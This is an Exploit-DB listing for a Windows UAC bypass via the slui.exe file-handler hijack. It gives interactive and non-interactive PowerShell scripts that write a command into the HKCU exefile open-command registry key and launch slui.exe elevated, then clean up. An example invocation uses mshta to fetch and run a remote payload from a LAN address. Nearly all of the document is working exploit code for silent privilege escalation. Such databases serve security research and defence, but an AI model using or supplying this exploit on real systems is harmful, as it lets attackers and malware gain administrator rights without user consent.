Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)

EDB-ID:

46998

CVE:

N/A


Author:

Gushmazuko

Type:

local


Platform:

Windows

Date:

2019-06-17


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Interactive Version:

<#
.SYNOPSIS
	This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
	Function   : SluiHijackBypass
	File Name  : SluiHijackBypass.ps1
	Author     : Gushmazuko
.LINK
	https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
	Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
	Load "cmd.exe" (By Default used 'arch 64'):
	SluiHijackBypass -command "cmd.exe" -arch 64

	Load "mshta http://192.168.0.30:4444/0HUGN"
	SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
#>

function SluiHijackBypass(){
	Param (

		[Parameter(Mandatory=$True)]
		[String]$command,
		[ValidateSet(64,86)]
		[int]$arch = 64
	)

	#Create registry structure
	New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
	Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force

	#Perform the bypass
	switch($arch)
	{
		64
		{
			#x64 shell in Windows x64 | x86 shell in Windows x86
			Start-Process "C:\Windows\System32\slui.exe" -Verb runas
		}
		86
		{
			#x86 shell in Windows x64
			C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
		}
	}

	#Remove registry structure
	Start-Sleep 3
	Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
}


################################################################################


Non-Interactive Version:

<#
.SYNOPSIS
  Noninteractive version of script, for directly execute.
  This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
	File Name  : SluiHijackBypass_direct.ps1
	Author     : Gushmazuko
.LINK
	https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
	Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
	Load "cmd.exe" (By Default used 'arch 64'):
	powershell -exec bypass .\SluiHijackBypass_direct.ps1
#>

$program = "cmd.exe"
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force
#For x64 shell in Windows x64:
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
#For x86 shell in Windows x64:
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force